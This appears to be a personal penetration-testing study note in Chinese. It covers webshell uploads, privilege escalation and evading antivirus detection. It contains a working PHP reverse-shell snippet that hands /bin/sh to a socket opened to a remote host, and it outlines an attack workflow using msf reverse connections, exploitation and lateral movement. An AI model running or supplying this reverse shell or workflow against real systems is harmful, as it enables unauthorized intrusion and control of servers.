我之前以为上传一个webshell然后连接就可以了。然后我今天发现那个shell只能让我连接上去。权限很低。
    上传webshell有两种
    一种是可以直接上传文件的 我们可以把shell写入文件里(木马可以很厉害级别)
    另一种是可以写入命令然后执行命令(不能直接上传webshell但是可以手写webshell进去)

    我今天遇到的就是第二种。我可以写一个php文件然后往里面写shell 要考虑的问题应该是 怎么上传厉害的webshell提权 然后保持状态免杀。
    反弹端口:
    https://www.leavesongs.com/PHP/backshell-via-php.html

    1. $sock = fsockopen($ip, $port);
    2. $descriptorspec = array(
    3. 0 => $sock,
    4. 1 => $sock,
    5. 2 => $sock
    6. );
    7. $process = proc_open('/bin/sh', $descriptorspec, $pipes);
    8. proc_close($process);

    现在的工具:cknief

    提权和当前用户权限有很大关系。如果用户只有可读可写权限怎么提权呢。” 权限”(Permission)是针对资源而言的。也就是说,设置权限只能是以资源为对象,即”设置某个文件夹有哪些用户可以拥有相应的权限”,而不能是以用户为主,即”设置某个用户可以对哪些资源拥有权限”。这就意味着”权限”必须针对”资源”而言,脱离了资源去谈权限毫无意义──在提到权限的具体实施时,”某个资源”是必须存在的。

    常规的方法
    上传webshell查看系统systeminfo 补丁然后搜索其他漏洞 使用msf反弹端口连接 然后针对某个漏洞进行攻击(明确可能存在某个漏洞后)然后内网渗透 横向纵向 使用其他提权工具

    如果没有可执行权限呢 可以使用cmd.exehttps://blog.csdn.net/iteye_2449/article/details/81336411 (待实验)